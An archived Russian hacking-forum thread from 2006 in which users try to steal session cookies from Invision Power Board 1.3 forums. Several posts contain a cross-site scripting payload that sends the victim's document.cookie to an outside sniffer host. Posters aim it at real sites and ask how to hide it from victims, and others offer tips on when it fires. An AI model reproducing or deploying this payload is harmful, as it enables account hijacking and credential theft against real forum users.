Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Ipb 1.3 Final vs Сниффер (https://forum.antichat.xyz/showthread.php?t=18334)

BlackSpider 28.04.2006 18:12

Ipb 1.3 Final vs Сниффер
 
Почему-то не срабатывает сниффер http://www.antichat.ru/sniff/. Я его натравливал на форум http://www.ссылки запрещены.ru/forum/index.php где-то месяц назад - он показывал номера юзеров и их хэши. Сегодня я такое повторил - он ничего не выдает: пишет, что был запрос и все! Если кто знает - поясните пожалуйста в чем здесь проблема или хотя бы ссылку! Я искал по форуму, но не нашел ответа! Вот ссылка на сниффер http://www.antichat.ru/sniff/log.php. Администраторам: перенесите, пожалуйста, мое сообщение в соответствующий раздел!

SiltStride 11.05.2006 14:21

Аналогично, форум Invision Power Board(U) v1.3.1 Final. Я посылаю примерное сообщение:

Привет чувак <script>img = new Image(); img.src = "http://antichat.org/s/.gif
"+document.cookie;</script>
Я его посылаю себе для пробы, мне приходит эта ссылка! Какой в этом смысл? ничего не приходит мне на снифф! что я не так делаю? заранее благодарен.
Может надо в код вставить? но там опять светится это сообщение.

Darth_antony 11.05.2006 15:44

2BlackSpider я так понимаю что бага работает только под ие...
2SiltStride возможно этото xss работает только в теле вообщения форума. что бы провритьь при создании ответа ткни "предварительный просмотр"

SiltStride 11.05.2006 16:52

Цитата:

Сообщение от Darth_antony
SiltStride возможно этото xss работает только в теле вообщения форума. что бы провритьь при создании ответа ткни "предварительный просмотр"

Получается, надо не в личку писать? а само сообщение правильное, не надо добавить что-нибудь, типа кода? например:
Код:

это сообщение надо писать в коде
так не надо? просто писать?

Кстати, куда в этом коде картинку вставлять? после каких слов?
Вот он:
<script>img = new Image(); img.src = "http://antichat.org/s/.gif
"+document.cookie;</script>
и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?

Azazel 11.05.2006 17:04

--> и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?

Учить javascript, юзать поиск по форуму и гугл http://www.google.ru/search?hl=ru&q=...gle&lr=lang_ru, читать статьи на античате http://antichat.ru/crackchat/HTML

Ознакомиться с этой темой http://forum.antichat.ru/thread15678.html и со многими другими.

podkashey 11.05.2006 17:45

Че-то как-то все так отмодерировали, что я ничего не понял... какая проблемма?
Вот это <scrip*t>img = ne*w Image(); im*g.src = "http://antichat.org/s/.gif
"+document.c*ookie;</s*cript>
сработает только, если включен хтмл.

degeneration x 11.05.2006 18:32

хз где вы это пытаетесь сделать, а на ruhelp'е не получается. Там авторизацию по сессиям ввели.

SiltStride 11.05.2006 20:46

на http://www.ссылки запрещены.ru! помогите кто нитбудь! как ссылку сделать? пишу, а он доходит так, как я отправляю! А что значит Хтмл отключен?как его включить? Я все перепробовал, ничего не помогает! дайте пожалуйста по этому поводу совет.

podkashey 11.05.2006 21:25

Цитата:

на http://www.ссылки запрещены.ru! помогите кто нитбудь! как ссылку сделать? пишу, а он доходит так, как я отправляю! А что значит Хтмл отключен?как его включить? Я все перепробовал, ничего не помогает! дайте пожалуйста по этому поводу совет.
Раз ты такое пишешь, то совет тебе - прочитать все на античате или хотя бы важные темы (они написаны так Важно: и прикрепелены наверху раздела.

SiltStride 13.05.2006 18:14

Так а с чего начать хотя бы?подскажите,пожалуйста, а то на сайте много статей и все вытекают одна из другой! с чего начать? заранее благодарен


Время: 04:08